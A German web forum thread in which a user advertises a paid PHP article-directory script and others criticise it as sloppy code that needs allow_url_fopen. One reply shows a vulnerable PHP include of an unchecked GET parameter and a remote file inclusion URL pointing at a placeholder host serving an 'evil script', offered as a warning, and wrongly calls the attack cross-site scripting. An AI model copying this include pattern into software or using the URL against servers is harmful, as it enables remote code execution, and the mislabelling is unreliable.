Internetprojekte bei ebay

[phpld]

Unter www.Artikelscript.de können Sie sich eine neue Artikel-Script-Sogftware ansehen.

Features:
- komplett suchmaschinenfreundlich
- jeder Artikel kann mit eigenen Keywords bestückt werden
- jede einzelne Seite kann vom Admin mit Keywords bestückt werden
- auf jeder einzelnen Seite können verschiedene Werbeformen integriert werden
- jede angelegte Kategorie kann mit Keywords bestückt werden
- jede Kategorie hat einen eigenen RSSfeed
- Kommentare können zu jeden Artikel erstellt werden
- Bewertungsmodul
- Admin-NEWS
- Versand des Ablehnungsgrundes bei Artikeln
- umfangreicher Adminbereich
- u.v.m.


Preis: 99,00 EUR (Einzelplatz) ab 3 Lizenzen gibt es Rabatt
Installation: 15,00 EUR (auf Wunsch)


Bestellungen sind per PN oder Email möglich.
Sie erhalten das Script, die Lizenz und eine Rechnung per Email.



Support erfolgt durch uns oder direkt vom Eigentümer!

[media_ct]

Bei diesem Script handelt es sich doch um nichts anderes als um eine Modifizierung des Social Bookmarks Scripts dieses Onnen`s welches extrem unsauber programmiert ist, url_fopen fordert und massenweise bei ebay verschleudert wird ...

[phpld]

Bei Ebay verschleudert?
Kann ich mir garnet vorstellen.

[decision]

Das Bookmark-Script ist oft bei ebay zu finden, nicht das Artikelscript.

url_fopen, hmmm??!!!!

[phpld]

Achso ... ja ... das Bookmarkscript gibts für 69 EUR bei Ebay.
Das ArtikelVerzeichnis zur Zeit nur über uns oder direkt bei Onnen.

[media_ct]

Sorry falls ich mich unverständlich ausgedrückt habe, damit war natürlich das Bookmark-Script gemeint, genau. Darauf war auch bezogen, dass es allow_url_fopen fordert (und mir zb. deshalb niemals auf den Server kommen würde) und ziemlich unsauber programmiert ist. Dass es beim Artikel-Script ähnlich sein wird, war lediglich eine Vermutung. Wenn ich mir den Source-Code und die Aufmachung ansehe und vergleiche, spricht aber alles dafür. Weiters hält der Entwickler nicht ein, was er verspricht ...

[phpld]

Weiters hält der Entwickler nicht ein, was er verspricht ...

Kannst mir das mal erläutern? Also ich habe bisher alles bekommen, was ich brauchte und dass sehr fix! Support ist TOP!
Was hast Du für ein Problem mit allow_url_fopen?

[Jumble]

Na, damit lassen sich wunderbar Code-Injections bei schlampig programmierten Scripten erstellen. Bei mir ist der Käse auch immer aus...

[phpld]

Kannst ja mal bei mir testen
Würde mich mal interessieren, ob es funktioniert

[Jumble]

Nee, da ist mir meine Zeit zu Schade für... Aber hier mal ein kleiner Code-Schnipsel, der zeigt, wie man es auf keinen Fall machen sollte und der so von PHP-Anfängern immer wieder gern genutzt wird:

$page = $_GET['page'];
include $page;

Da wird dann der Seiten-Inhalt ungeprüft per GET-Parameter includet. Ruft man die Seite jetzt z.B. mit
seite.php?page=http://www.example.com/böses-skript.txt
auf, kann ich auf Deinem Webspace meine PHP-Progs ausführen.

Das ganze funktioniert nur mir allow_url_fopen On.

Wenn man wirklich auf Inhalte fremder Seiten zugreifen muß, kann man dafür die curl-Lib nutzen und ist nicht auf solche hirnrissigen Mechanismen angewiesen, die PHP leider zu hauf parat hält.

PS: Die Art dieser Attacke nennt sich glaube ich Cross-Site-Scripting, Code-Injections sind was anderes...

[phpld]

Also wernn jemand mal Zeit hat